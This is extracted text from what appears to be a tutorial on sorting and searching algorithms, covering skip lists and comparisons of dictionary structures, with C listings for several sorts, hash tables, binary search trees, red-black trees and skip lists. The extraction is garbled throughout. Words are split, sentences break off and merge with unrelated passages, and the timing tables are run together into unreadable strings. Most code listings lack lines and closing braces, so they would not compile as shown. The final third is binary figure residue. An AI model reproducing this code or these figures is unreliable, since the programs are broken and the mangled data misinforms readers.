name, you index to the tab r epresenting the first character of the desired entry. In Figure 3.8, for exampl e, the top-most list represents a simple linked list with no tabs. Adding tabs (middle figure) facilitates the search. In this case, level-1 pointers are trav ersed. Once the correct segment of the list is found, level-0 pointers are trav ersed to find the specific entry. The indexing scheme may be extended as shown in the bottom figure, where we now have an index to the index. To locate an item, level-2 pointers are tra vers, th e coin is tossed to determine if it should be level-1. If you win, the coin is tossed again to determine if the node should be level-2. Another win, and the c oin is tossed to determine if the node should be level-3. This process repeats until you lose. The skip list algorithm has a probabilistic component, and thus has a pr obabilistic bounds on the time required to execute. However, these bounds are q uite tight in normal circumstances. For example, to search a list containing 10 00 items, the probability that search time will be 5 times the average is about 1 in 1,000,000,000,000,000,000[5]. Figure 3.8: Skip List Construction Implementation An ANSI-C implementation of a skip list may be found in Section 4.8 (page). Typed ef T and comparison operators CompLT and CompEQ should be altered to reflect the data stored in the list. In addition, MAXLEVEL should be set based on the maximum s ize of the dataset. To initialize, InitList is called. The list header is allocated and ini tialized. To indicate an empty list, all levels are set to point to the header. InsertNode allocates a new node and inserts it in the list. InsertNode first searches for the correct insertion point. While searching, the update array mai ntains pointers to the upper-level nodes encountered. This information is subse quently used to establish correct links for the newly inserted node. NewLevel i s determined using a random number generator, and the node allocated. The forw ard links are then established using information from the update array. DeleteN ode deletes and frees a node, and is implemented in a similar manner. FindNode searches the list for a particular value. a) Comparison of Methods We have seen several ways to construct dictionaries: hash tables, unbalanced bin ary. Thi s is especially true if many small nodes are to be allocated. For hash tables, only one forward pointer per node is required. In addition, th e hash table itself must be allocated. For red-black trees, each node has a left, right and parent pointer. In additio n, the color of each node must be recorded. Although this requires only one bit , more space may be allocated to ensure that the size of the structure is proper ly aligned. Thus, each node in a red-black tree requires enough space for 3-4 p ointers. For skip lists, each node has a level-0 forward pointer. The probability of hav ing a level-1 pointer is 1 2. The probability of having a level-2 pointer is 1 4. In general, the number of forward pointers per node is Time. The algorithm should be efficient. This is especially true if a large da taset is expected. Table 3.2 compares the search time for each algorithm. Note that worst-case behavior for hash tables and skip lists is extremely unlikely. Actual timing tests are described below. Simplicity. If the algorithm is short and easy to understand, fewer mistakes ma y be made. This not only makes your life easy, but the maintenance programmer e ntrusted with the task of making repairs will appreciate any efforts you make in this area. The number of statements required for each algorithm is listed in T able 3.2. methodstatementsaverage timeworst-case timehash table26O(1)O(n)unbalanced tree41O(lg n)O(n)re black tree120O(lg n)O(lg n)skip list55O(lg n)O(n) Table 3.2: Comparison of Dictionarie Average time for insert, search and delete operations on a database of 6 5,536 (216) randomly input items may be found in Table 3.3. For this test the h ash table size was 10,009 and 16 index levels were allowed for the skip list. W hile there is some variation in the timings for the four methods, they are close enough so that other considerations should come into play when selecting an alg orithm. methodinsertsearchdeletehash table18810unbalanced tree371726red-black tree401637skip list4831 Average Time (ms), 65536 Items, Random Input Table 3.4 shows the average search time for two sets of data: a random s et, where all values are unique, and an ordered set, where values are in ascendi ng order. Ordered input creates a worst-case scenario for unbalanced tree algor ithms, as the tree ends up being a simple linked list. The times shown are for a single search operation. If we were to search for all items in a database of 65,536 values, a red-black tree algorithm would take .6seconds, while an unbalanc ed tree algorithm would take 1 hour. counthash tableunbalanced treered-black treeskip list164325random2563449input4,0963761265,536 631,03361165,536755,019915Table 3.4: Average Search Time (us) 1. Code Listings a) Insertion Sort Code typedef int T; typedef int TblIndex; #define CompGT(a,b) (a > b) void InsertSort(T *Lb, T *Ub) { T V, *I, *J, *Jmin; /************************ * Sort Array[Lb..Ub] * ************************/ Jmin = Lb - 1; for (I = Lb + 1; I <= Ub; I++) { V = *I; /* Shift elements down until */ /* insertion point found. */ for (J = I-1; J != Jmin && CompGT(*J, V); J--) *(J+1) = *J; *(J+1) = V; a) typedef int T; typedef int TblIndex; #define CompGT(a,b) (a > b) void ShellSort(T *Lb, T *Ub) { TblIndex H, N; T V, *I, *J, *Min; /************************** * Sort array A[Lb..Ub] * **************************/ /* compute largest increment */ N = Ub - Lb + 1; H = 1; if (N < 14) H = 1; else if (sizeof(TblIndex) == 2 && N > 29524) H = 3280; else { while (H < N) H = 3*H + 1; H /= 3; H /= 3; } while (H > 0) { /* sort-by-insertion in increments of H */ /* Care must be taken for pointers that */ /* wrap through zero. */ Min = Lb + H; for (I = Min; I <= Ub; I++) { V = *I; for (J = I-H; CompGT(*J, V); J -= H) { *(J+H) = *J; if (J <= Min) { J -= H; break; } } *(J+H) = V; } /* compute next increment */ H /= 3; Quicksort Code typedef int T; typedef int TblIndex; #define CompGT(a,b) (a > b) T *Partition(T *Lb, T *Ub) { T V, Pivot, *I, *J, *P; unsigned int Offset; /***************************** * partition Array[Lb..Ub] * *****************************/ /* select pivot and exchange with 1st element */ Offset = (Ub - Lb)>>1; P = Lb + Offset; Pivot = *P; *P = *Lb; I = Lb + 1; J = Ub; while (1) { while (I < J && CompGT(Pivot, *I)) I++; while (J >= I && CompGT(*J, Pivot)) J--; if (I >= J) break; V = *I; *I = *J; *J = V; J--; I++; } /* pivot belongs in A[j] */ *Lb = *J; *J = Pivot; } return J; void QuickSort(T *Lb, T *Ub) { T *M; /************************** * Sort array A[Lb..Ub] * **************************/ while (Lb < Ub) { /* quickly sort short lists */ if (Ub - Lb <= 12) { InsertSort(Lb, Ub); return; } /* partition into two segments */ M = Partition (Lb, Ub); /* sort the smallest partition */ Qsort Code #include <limits.h> #define MAXSTACK (sizeof(size_t) * CHAR_BIT) static void Exchange(void *a, void *b, size_t size) { size_t i; /****************** * exchange a,b * ******************/ for (i = sizeof(int); i <= size; i += sizeof(int)) { int t = *((int *)a); *(((int *)a)++) = *((int *)b); *(((int *)b)++) = t; } for (i = i - sizeof(int) + 1; i <= size; i++) { char t = *((char *)a); *(((char *)a)++) = *((char *)b); *(((char *)b)++) = t; } void qsort(void *base, size_t nmemb, size_t size, int (*compar)(const void *, const void *)) { void *LbStack[MAXSTACK], *UbStack[MAXSTACK]; int sp; unsigned int Offset; /******************** * ANSI-C qsort() * ********************/ LbStack[0] = (char *)base; UbStack[0] = (char *)base + (nmemb-1)*size; for (sp = 0; sp >= 0; sp--) { char *Lb, *Ub, *M; char *P, *I, *J; Lb = LbStack[sp]; Ub = UbStack[sp]; while (Lb < Ub) { /* select pivot and exchange with 1st element */ Offset = (Ub - Lb) >> 1; P = Lb + Offset - Offset % size; Exchange (Lb, P, size); /* partition into two segments */ I = Lb + size; J = Ub; while (1) { while (I < J && compar(Lb, I) > 0) I += size; while (J >= I && compar(J, Lb) > 0) J -= size; if (I >= J) break; Exchange (I, J, size); J -= size; I += size; /* pivot belongs in A[j] */ Exchange (Lb, J, size); M = J; /* keep processing smallest segment, and stack largest */ if (M - Lb <= Ub - M) { if (M + size < Ub) { LbStack[sp] = M + size; UbStack[sp++] = Ub; } Ub = M - size; } else { if (M - size > Lb) { LbStack[sp] = Lb; UbStack[sp++] = M - size; } Lb = M + size; } } a) #include <stdlib.h> #include <stdio.h> /* modify these lines to establish data type */ typedef int T; #define CompEQ(a,b) (a == b) typedef struct Node_ { struct Node_ *Next; T Data; } Node; typedef int HashTableIndex; Node **HashTable; int HashTableSize; HashTableIndex Hash(T Data) { /* division method */ return (Data % HashTableSize); } Node *InsertNode(T Data) { Node *p, *p0; HashTableIndex bucket; /* insert node at beginning of list */ bucket = Hash(Data); if ((p = malloc(sizeof(Node))) == 0) { fprintf (stderr, "out of memory (InsertNode)\n"); exit(1); } p0 = HashTable[bucket]; /* next node */ /* data stored in node */ void DeleteNode(T Data) { Node *p0, *p; HashTableIndex bucket; /* find node */ p0 = 0; bucket = Hash(Data); p = HashTable[bucket]; while (p && !CompEQ(p->Data, Data)) { p0 = p; p = p->Next; } if (!p) return; /* p designates node to delete, remove it from list */ if (p0) /* not first node, p0 points to previous node */ p0->Next = p->Next; else /* first node on chain */ HashTable[bucket] = p->Next; } free (p); Node *FindNode (T Data) { Node *p; p = HashTable[Hash(Data)]; while (p && !CompEQ(p->Data, Data)) p = p->Next; return p; } a) Binary Search Tree Code #include <stdio.h> #include <stdlib.h> /* modify these lines to establish data type */ typedef int T; #define CompLT(a,b) (a < b) #define CompEQ(a,b) (a == b) typedef struct Node_ { struct Node_ *Left; struct Node_ *Right; struct Node_ *Parent; T Data; } Node; Node *Root = NULL; Node *InsertNode(T Data) { Node *X, *Current, *Parent; /* /* /* /* left child */ right child */ parent */ data stored in node */ /*********************************************** * allocate node for Data and insert in tree * ***********************************************/ /* setup new node */ if ((X = malloc (sizeof(*X))) == 0) { fprintf (stderr, "insufficient memory (InsertNode)\n"); exit(1); } X->Data = Data; X->Left = NULL; X->Right = NULL; /* find X's parent */ Current = Root; Parent = 0; while (Current) { if (CompEQ(X->Data, Current->Data)) return (Current); Parent = Current; Current = CompLT(X->Data, Current->Data) ? Current->Left : Current->Right; } X->Parent = Parent; /* insert X in tree */ if(Parent) if(CompLT(X->Data, Parent->Data)) Parent->Left = X; else Parent->Right = X; else Root = X; return(X); } void DeleteNode(Node *Z) { Node *X, *Y; /***************************** * delete node Z from tree * *****************************/ /* Y will be removed from the parent chain */ if (!Z || Z == NULL) return; /* find tree successor */ if (Z->Left == NULL || Z->Right == NULL) Y = Z; else { Y = Z->Right; while (Y->Left != NULL) Y = Y->Left; } /* X is Y's only child */ if (Y->Left != NULL) X = Y->Left; else X = Y->Right; /* remove Y from the parent chain */ if (X) X->Parent = Y->Parent; if (Y->Parent) if (Y == Y->Parent->Left) Y->Parent->Left = X; else Y->Parent->Right = X; else Root = X; /* /* /* if Y is the node we're removing */ Z is the data we're removing */ if Z and Y are not the same, replace Z with Y. */ (Y != Z) { Y->Left = Z->Left; if (Y->Left) Y->Left->Parent = Y; Y->Right = Z->Right; if (Y->Right) Y->Right->Parent = Y; Y->Parent = Z->Parent; if (Z->Parent) if (Z == Z->Parent->Left) Z->Parent->Left = Y; else Z->Parent->Right = Y; else Root = Y; free (Z); } else { free (Y); } Node *FindNode(T Data) { /******************************* * find node containing Data * *******************************/ Node *Current = Root; while(Current != NULL) if(CompEQ(Data, Current->Data)) return (Current); else Current = CompLT (Data, Current->Data) ? Current->Left : Current->Right; return(0); Red-Black Tree Code #include <stdlib.h> #include <stdio.h> /* modify these lines to establish data type */ typedef int T; #define CompLT(a,b) (a < b) #define CompEQ(a,b) (a == b) /* red-black tree description */ typedef enum { Black, Red } NodeColor; typedef struct Node_ { struct Node_ *Left; struct Node_ *Right; struct Node_ *Parent; NodeColor Color; T Data; } Node; /* /* /* /* /* left child */ right child */ parent */ node color (black, red) */ data stored in node */ #define NIL &Sentinel /* all leafs are sentinels */ Node Sentinel = { NIL, NIL, 0, Black, 0}; Node *Root = NIL; Node *InsertNode(T Data) { Node *Current, *Parent, *X; /*********************************************** * allocate node for Data and insert in tree * ***********************************************/ /* setup new node */ if ((X = malloc (sizeof(*X))) == 0) { printf ("insufficient memory (InsertNode)\n"); exit(1); } X->Data = Data; X->Left = NIL; X->Right = NIL; X->Parent = 0; X->Color = Red; /* find where node belongs */ Current = Root; Parent = 0; while (Current != NIL) { if (CompEQ(X->Data, Current->Data)) return (Current); Parent = Current; Current = CompLT(X->Data, Current->Data) ? Current->Left : Current->Right; } /* insert node in tree */ if(Parent) { if(CompLT(X->Data, Parent->Data)) Parent->Left = X; else Parent->Right = X; X->Parent = Parent; } else Root = X; InsertFixup(X); return(X); /* root of red-black tree */ * after inserting node X * *************************************/ /* check red-black properties */ while (X != Root && X->Parent->Color == Red) { /* we have a violation */ if (X->Parent == X->Parent->Parent->Left) { Node *Y = X->Parent->Parent->Right; if (Y->Color == Red) { /* uncle is red */ X->Parent->Color = Black; Y->Color = Black; X->Parent->Parent->Color = Red; X = X->Parent->Parent; } else { /* uncle is black */ if (X == X->Parent->Right) { /* make X a left child */ X = X->Parent; RotateLeft(X); } /* recolor and rotate */ X->Parent->Color = Black; X->Parent->Parent->Color = Red; RotateRight(X->Parent->Parent); } } else { /* mirror image of above code */ Node *Y = X->Parent->Parent->Left; if (Y->Color == Red) { /* uncle is red */ X->Parent->Color = Black; Y->Color = Black; X->Parent->Parent->Color = Red; X = X->Parent->Parent; } else { /* uncle is black */ if (X == X->Parent->Left) { X = X->Parent; RotateRight(X); } X->Parent->Color = Black; X->Parent->Parent->Color = Red; RotateLeft(X->Parent->Parent); } Root->Color = Black; **************************/ Node *Y = X->Right; /* establish X->Right link */ X->Right = Y->Left; if (Y->Left != NIL) Y->Left->Parent = X; /* establish Y->Parent link */ if (Y != NIL) Y->Parent = X->Parent; if (X->Parent) { if (X == X->Parent->Left) X->Parent->Left = Y; else X->Parent->Right = Y; } else { Root = Y; } /* link X and Y */ Y->Left = X; if (X != NIL) X->Parent = Y; void RotateRight(Node *X) { /**************************** * rotate Node X to right * ****************************/ Node *Y = X->Left; /* establish X->Left link */ X->Left = Y->Right; if (Y->Right != NIL) Y->Right->Parent = X; /* establish Y->Parent link */ if (Y != NIL) Y->Parent = X->Parent; if (X->Parent) { if (X == X->Parent->Right) X->Parent->Right = Y; else X->Parent->Left = Y; } else { Root = Y; } /* link X and Y */ Y->Right = X; if (X != NIL) X->Parent = Y; void DeleteNode(Node *Z) { Node *X, *Y; /***************************** * delete node Z from tree * *****************************/ if (!Z || Z == NIL) return; if (Z->Left == NIL || Z->Right == NIL) { /* Y has a NIL node as a child */ Y = Z; } else { /* find tree successor with a NIL node as a child */ Y = Z->Right; while (Y->Left != NIL) Y = Y->Left; } /* X is Y's only child */ if (Y->Left != NIL) X = Y->Left; else X = Y->Right; /* remove Y from the parent chain */ X->Parent = Y->Parent; if (Y->Parent) if (Y == Y->Parent->Left) Y->Parent->Left = X; else Y->Parent->Right = X; else Root = X; if (Y != Z) Z->Data = Y->Data; if (Y->Color == Black) DeleteFixup (X); free (Y); void DeleteFixup(Node *X) { /************************************* * maintain red-black tree balance * * after deleting node X * *************************************/ while (X != Root && X->Color == Black) { if (X == X->Parent->Left) { Node *W = X->Parent->Right; if (W->Color == Red) { W->Color = Black; X->Parent->Color = Red; RotateLeft (X->Parent); W = X->Parent->Right; } if (W->Left->Color == Black && W->Right->Color == Black) { W->Color = Red; X = X->Parent; } else { if (W->Right->Color == Black) { W->Left->Color = Black; W->Color = Red; RotateRight (W); W = X->Parent->Right; } W->Color = X->Parent->Color; X->Parent->Color = Black; } X->Color = Black; } } else { Node *W = X->Parent->Left; if (W->Color == Red) { W->Color = Black; X->Parent->Color = Red; RotateRight (X->Parent); W = X->Parent->Left; } if (W->Right->Color == Black && W->Left->Color == Black) { W->Color = Red; X = X->Parent; } else { if (W->Left->Color == Black) { W->Right->Color = Black; W->Color = Red; RotateLeft (W); W = X->Parent->Left; } W->Color = X->Parent->Color; X->Parent->Color = Black; W->Left->Color = Black; RotateRight (X->Parent); X = Root; } } Node *FindNode(T Data) { /******************************* * find node containing Data * *******************************/ Node *Current = Root; while(Current != NIL) if(CompEQ(Data, Current->Data)) return (Current); else Current = CompLT (Data, Current->Data) ? Current->Left : Current->Right; return(0); Skip List Code #include <stdio.h> #include <stdlib.h> /* define data-type and compare operators here */ typedef int T; #define CompLT(a,b) (a < b) #define CompEQ(a,b) (a == b) /* * levels range from (0 .. MAXLEVEL) */ #define MAXLEVEL 15 typedef struct Node_ { T Data; struct Node_ *Forward[1]; } Node; typedef struct { Node *Hdr; int ListLevel; } SkipList; SkipList List; #define NIL List.Hdr void InitList() { int i; /************************** * initialize skip list * **************************/ if ((List.Hdr = malloc(sizeof(Node) + MAXLEVEL*sizeof(Node *))) == 0) { printf ("insufficient memory (InitList)\n"); exit(1); } for (i = 0; i <= MAXLEVEL; i++) List.Hdr->Forward[i] = NIL; List.ListLevel = 0; /* user's data */ /* skip list forward pointer */ Node *InsertNode(T Data) { int i, NewLevel; Node *update[MAXLEVEL+1]; Node *X; /*********************************************** * allocate node for Data and insert in list * ***********************************************/ /* find where data belongs */ X = List.Hdr; for (i = List.ListLevel; i >= 0; i--) { while (X->Forward[i] != NIL && CompLT(X->Forward[i]->Data, Data)) X = X->Forward[i]; update[i] = X; } X = X->Forward[0]; if (X != NIL && CompEQ(X->Data, Data)) return(X); /* determine level */ NewLevel = 0; while (rand() < RAND_MAX/2) NewLevel++; if (NewLevel > MAXLEVEL) NewLevel = MAXLEVEL; if (NewLevel > List.ListLevel) { /* make new node */ if ((X = malloc(sizeof(Node) + NewLevel*sizeof(Node *))) == 0) { printf ("insufficient memory (InsertNode)\n"); exit(1); } X->Data = Data; /* update forward links */ for (i = 0; i <= NewLevel; i++) { X->Forward[i] = update[i]->Forward[i]; update[i]->Forward[i] = X; } return(X); void DeleteNode(T Data) { int i; Node *update[MAXLEVEL+1], *X; /******************************************* * delete node containing Data from list * *******************************************/ /* find where data belongs */ X = List.Hdr; for (i = List.ListLevel; i >= 0; i--) { while (X->Forward[i] != NIL && CompLT(X->Forward[i]->Data, Data)) X = X->Forward[i]; update[i] = X; } X = X->Forward[0]; if (X == NIL || !CompEQ(X->Data, Data)) return; /* adjust forward pointers */ for (i = 0; i <= List.ListLevel; i++) { if (update[i]->Forward[i] != X) break; update[i]->Forward[i] = X->Forward[i]; } free (X); /* adjust header level */ while ((List.ListLevel > 0) && (List.Hdr->Forward[List.ListLevel] == NIL)) List.ListLevel--; Node *FindNode(T Data) { int i; Node *X = List.Hdr; /******************************* * find node containing Data * *******************************/ for (i = List.ListLevel; i >= 0; i--) { while (X->Forward[i] != NIL && CompLT(X->Forward[i]->Data, Data)) X = X->Forward[i]; } X = X->Forward[0]; if (X != NIL && CompEQ(X->Data, Data)) return (X); return(0); } 1. Bibliography [1] Donald E. Knuth. The Art of Computer Programming, volume 3. Massachusetts : Addison-Wesley, 1973. [2] Thomas H. Cormen, Charles E. Leiserson, and Ronald L. Rivest. Introducti on to Algorithms. New York: McGraw-Hill, 1992. [3] Alfred V. Aho, John E. Hopcroft, and Jeffrey D. Ullman. Data Structures and Algorithms. Massachusetts: Addison-Wesley, 1983. [4] Peter K. Pearson. Fast hashing of variable-length text strings. Communica tions of the ACM, 33(6):677-680, June 1990. [5] William Pugh. Skip lists: A probabilistic alternative to balanced trees. C ommunications of the ACM, 33(6):668-676, June 1990. vv r r r r t<<<p<<<dPPNT"Arial, Helvetica e e tp~~~pp~pp~~~pp~t~ ~~ p~ ~~ dPPNT"ArialdPPNT"SystemdPPNT"Arial, (zS#dPPNT"Systemt~H c H c~c~H Hp~H c H c~c~H HdPPNT"ArialdPPNT"SystemdPPNT"Ar ( Q43dPPNT"Systempww4ww4 tu ywwvvvvuuuuuuuuuuuvvv v w w w x x xxxyyyyyyyyyxxxxxwwtNt2z8w8z2y3y3y3x3x3w3w3w3v3v3u3u3u3t2w8dPPNT ArialdPPNT"SystemdPPNT"Sy wHwHvHvHvGvGuGuGuGuFuFuFuEuEuEuEuDvDvDvDvDwDwDwDxDxDxDxDxDyEyEyEyEyFyFyFyGyGxGxG xGxHxHwHwHtNtiznwnziyiyiyixixiwjwjwjviviuiuiuitiwndPPNT ArialdPPNT"SystemdPPNT"Systempw|w zy~w~w~v~v~v~v~u}u}u}u}u|u|u|u|u{u{u{v{vzvzvzwzwzwzxzxzxzx{x{y{y{y|y|y|y|y}y}y}x }x~x~x~x~w~w~tNt zwz y yyxxwwwvvuuu t wdPPNT ArialdPPNT"SystemdPPNT"Systempw ww tuywwvvvvuuuuuuuuuuuvvvvwwwxxxxxyyyyyyyyyxxxxxw zwz y x x w w w v v u u 7 7 t%%%%p%%%%dPPNT"Arial, Helvetica .+4dPPNT"Systemt%888%%8p%888%%8t8JJJ88Jp8J temtJ9\]\9\]J]J9\9pJ9\]\9\]J]J9\9dPPNT"Arial*2dPPNT"Systemt%7%%77%p tN ptN p@r@[rtNpvvpqqqqqqqqqqqqqpvp f f (;(a)dPPNT"SystemdPPNTCentury Schoolbook*m(b)dPPNT"SystemdPPNTCentury SchoolbookdPPNT"Sy oolbook+m(c)dPPNT"Systemp/'/5/'/0/5tN,319/91314140404/4/4/4.4.4-4-4-4,4,3/9p'5'05 4,4,4,4+4+4*4*4)3,9"!! t&&&&p&&&&dPPNT"Arial, dPPNT ArialdPPNT"System t dPPNT Arial)m2sdPPNT"SystempCuC^u tNtzztttuuuuuuuuutttzdPPNT ArialdPPNT"System t Yd YYd d YdPPNT Arial)m1sdPPNT"Systemp j j tN} ~ ~ } dPPNT ArialdPPNT"System tz z z z dPPNT Arial( 1sdPPNT"Systemp tN} ~} ~ dPPNT ArialdPPNT"System tz z zzdPPNT Arial)m1sdPPNT"Systemp C u C ^ u tN}t z z t t t u u u u u u u u u~t~t}t zdPPNT ArialdPPNT"System tzY dzY Y dzdzYdPPNT Arial)m1sdPPNT"SystemdPPNTCentury Schoolbook (;(a)dPPNT"SystemdPPNTCentury Schoolbook*m(b)dPPNT"SystempA*A8A*A3A8 tN>7D<A<D7C7C7B7B7B7A8A8@8@7@7?7?7>7>7A<p*8*38tN7<<7777778887777 t\<nan<na\a\<n<p\<nan<na\a\<n<dPPNT"Arial (hL4dPPNT"Systemt\nnn\\np\nnn\\ndPPNT"Arial)l4dPPNT"Syst tNPVSVUUUTTSSSRRQQQPSpeeee etNbhehgggffeeeddcccbep tNp tNp as a s ssap p:L:LLL: ffpf f dPPNTCentury Schoolbook f, .+ 01)53)1dPPNTSymbol, Symbol( 6,)R,). dPPNT"SystemTlTl Tl Symbol(=+=))+)=(-=))+)=(>=) 73( 1/ dPPNT"System. t9"]"9"]]9"9p9"]"9"]]9"9dPPNT"ArialdPPNT"SystemdPPNT"Arial, Helvetica .+I4dPPNT"Systemt]" "]" ]"]p]" "]" ]"]dPPNT"ArialdPPNT"SystemdPPNT" NT"SystemdPPNT"Arial(eI1dPPNT"SystemtY]k k]k Y Y]k]pY]k k]k Y Y]k]dPPNT"Arial T"Arial)$5dPPNT"SystemtYkkkYYkpYkkkYYkdPPNT"ArialdPPNT"SystemdP ((a)dPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook*H(b)dPPNT"Sys lbookdPPNT"SystemdPPNTCentury Schoolbook+I(c)dPPNT"SystempVo9y o q s t t}tbt`u^w^y]w]u\tZt T ArialdPPNT"SystemdPPNT"SystempVoyoqsttttuwywuttttsqodPPNT ArialdPP r New, Courier ( ELbdPPNT"SystemdPPNT1Courier NewdPPNT"SystemdPPNT1Courier New) UbdPPNT"Systemp& + + ' & tN" ( " ( ( ( ( ' ' ' ' ' ' ' ( ( ( ( " dPPNTCentury SchoolbookdPPNT"SystemdPPNTCe New(UELbdPPNT"SystemdPPNT1Courier NewdPPNT"SystemdPPNT1Courier New)LMdPPNT"SystemdPPNT1 PNT1Courier New)ELbdPPNT"SystemDUpSb SRS S S t)B))BB)p)B))BB)t);B;;B)B);p);B;;B)B);dPPNT"ArialdPPNT"SystemdPPNT"Arial, .+-5#dPPNT"Systemt;MBMMB;B;Mp;MBMMB;B;MdPPNT"ArialdPPNT"SystemdPPNT"Arial*#d T"Systemt B B B p B B B t BB B p BB B dPPNT"ArialdPPNT"Syst emt x x x xp x x x xt x x xxp x x xxdPPNT"Arial t."2 222221111000////...... . . .!.!.!.!."/"/"/"/"0"0"0"1"1!1!1!2!2 2 2 2tNs#x x#s"s emdPPNT"SystempV0VtV0VttT.X2V2V2U2U2U2U1T1T1T1T0T0T0T/T/T/T/T.U.U.U.U.V.V.V.W.W.W.W.X .X/X/X/X/X0X0X0X1X1X1W1W2W2W2V2V2tNSsYxVxYsXsXsXsWsWsVsVsVsUsUsTsTsTsSsVxdPPNT Ariald PPNT"SystemdPPNT"Systemp 0 t 0 tt . 2 2 2 2 2 2 1 1 1 1 0 0 0 / / / / . . . . . . . . . . . Courier ( HashTabledPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial (# 0dPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial*1dPPNT"SystemdPPNT ArialdPPNT"Systemd PPNT"SystemdPPNT Arial*3dPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial*4dPPNT"SystemdP *5dPPNT"SystemdPPNT ArialdPPNT"SystemdPPNT Arial*6dPPNT"SystemdPPNT ArialdPPNT"System 5 5" 3t t3 t~ ! ! ! ! p~ ! ! ! ! dPPNT ArialdPPNT" .+ 20dPPNT"Systemt~&/EO5/2//1,2)5'8&;&?&B'F)I,K/M2N5O9N<M?KBIDFEBE?E;D8B5?2<19/5 &B'F)I,K/M2N5O9N<M?KBIDFEBE?E;D8B5?2<19/5/dPPNT ArialdPPNT"SystemdPPNT Arial(8<7dPPNT"Sys SiSlSpTsVvYx\z_|c|f|izlxovqsrprlriqeobl`i^f]c\p~S\r|c\_]\^Y`VbTeSiSlSpTsVvYx\z_|c |f|izlxovqsrprlriqeobl`i^f]c\dPPNT ArialdPPNT"SystemdPPNT Arial++.16dPPNT"System rialdPPNT"SystemdPPNT Arial(f4dPPNT"SystempAW4A4WpAJWaWaAJt~&E52/,)'&&&' mdPPNT Arial(f37dPPNT"SystempAWAWpAWWAP3B 323 .+4dPPNT"Systemt~/=O-/)/&1#2 58;?BF I#K&M)N-O0N4M7K9I;F<B=?<;;89572410/-/p~/=O-/ <B=?<;;89572410/-/dPPNT ArialdPPNT"SystemdPPNT Arial+-7dPPNT"Systemp$1$1t~8\X VsWpXlWiVeTbR`O^K]H\p~8\X|H\D]A^>`;b:e8i8l8p:s;v>xAzD|H|K|OzRxTvVsWpXlWiVeTbR`O^K ]H\dPPNT ArialdPPNT"SystemdPPNT Arial++16dPPNT"Systemt~S sc _ \ Y W U T S T 3 3 t~ ! ! ! ! dPPNT Arial, .+ 20 empAXAXpAXXAt~ \3 3 N >3 .+ 37 0 0 t "%)+./00/.+)%"p .+!blackdPPNT"Systemt Tbx fbcb_c\eYhWkUnTrTvUyW}Y \ _ c f j n q t v}wyxvxrwnvkt kthqencjbfbdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook(ilreddPPNT"System WY\_cfjnqtvw xxwvtqnjfp Txfc_\YWUTTU WY\_cfjnqtvw xxwvtqnjfdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook) reddPPNT"Syst book ( BdPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook(WTAdPPNT"Syste ookdPPNT"SystemdPPNTCentury Schoolbook( ( eparentdPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook) uncledP Y[^aeimpsvxz {{zxvspmip W{iea^[YXWWX Y[^aeimpsvxz {{zxvspmidPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook) blackdPPNT"Sy ( BdPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook(ZTAdPPNT"Syste PPNT"SystemdPPNTCentury Schoolbook( y y t "%(+-/00/-+(%"p .+!blackdPPNT"Systemt Tbx fbbb_c\eYhWkUnTrTvUyW}Y \ _ b f j m q t v}wyxvxrwnvkt kthqemcjbfbdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook(ilreddPPNT"System PNT"SystemdPPNTCentury Schoolbook ( BdPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook(WUAdPPNT"Syste ookdPPNT"SystemdPPNTCentury Schoolbook( ( eparentdPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook) uncledP ( AdPPNT"SystemdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook(YUXdPPNT"Syste PPNT"SystemdPPNTCentury Schoolbook( eCdPPNT"SystempTT tNps s p8G8Gps s ps s pdPPNT ( ddPPNT"SystemdPPNTSymboldPPNT"SystemdPPNTSymbol( gdPPNT"SystemdPPNTSymboldPPNT"Sys temdPPNTSymbol( adPPNT"SystemdPPNTSymboldPPNT"SystemdPPNTSymbol( "edPPNT"System t ;`;<=?AD H L O SWZ\^_`_^\ZWSOLHDA?=<;p ;`;<=?AD H L O (AblackdPPNT"SystempuAuAdPPNTCentury SchoolbookdPPNT"SystemdPPNTCentury Schoolbook (UBdPPNT"SystempuX gug XdPPNTSymboldPPNT"SystemdPPNTSymbol t222p222dPPNT"ArialdPPNT"SystemdPPNT"Arial, Helvetica .+"#dPPNT"Systemt222p222tMiMiiMMpMiMiiMMdPPNT"ArialdPPNT"SystemdPPNT"Ar dPPNT"ArialdPPNT"SystemdPPNT"Arial)7bobdPPNT"Systemt FF 8Fp8F 8FdPPNT"ArialdPPNT"SystemdPPNT"Arial)7bobdPPNT"SystemtFS SS FSpFS FSt8'FBF'FB8B8'F'p8'FBF'FB8B8'F'dPPNT"ArialdPPNT"SystemdPPNT"Arial)8caldPPNT"Syst mtF]SxS]SxFxF]S]pF]SxS]SxFxF]S]t8 FF F88 F p8 FF F88 F dPPNT"Ariald tJ"N'L'L'L'K&K&K&K&K&J%J%J%J%J$J$J$K#K#K#K#K#L#L"L"M"M#M#M#N#N#N#N$N$N$N%N%N%N%N&N&N M'M'L'tNIHOMLMOHOHNHNHMHMHMILILIKHKHKHJHJHIHLMdPPNT ArialdPPNT"SystemdPPNT"SystempL[L L[L ]L]L]K]K]K\K\K\J\J[J[J[J[JZJZKZKZKYKYKYLYLYLYMYMYMYMYNYNZNZNZNZN[N[N[N[N\N\N\N\M ]M]M]M]L]tNI~O L O~O~N~N M M M L L K K K J~J~I~L dPPNT ArialdPPNT"SystemdPPNT"SystempL LL NT ArialdPPNT"SystemdPPNT"SystempLL#LL#tJNLLLKKKKKJJJJJJJKKKKKLLLMMM L7K6K6K6K6K6J5J5J5J5J4J4J4K3K3K3K3K3L3L2L2M2M3M3M3N3N3N3N4N4N4N5N5N5N5N6N6N6M6M6M7M7L7tNIXO]L PPNT"SystempLkL LkL 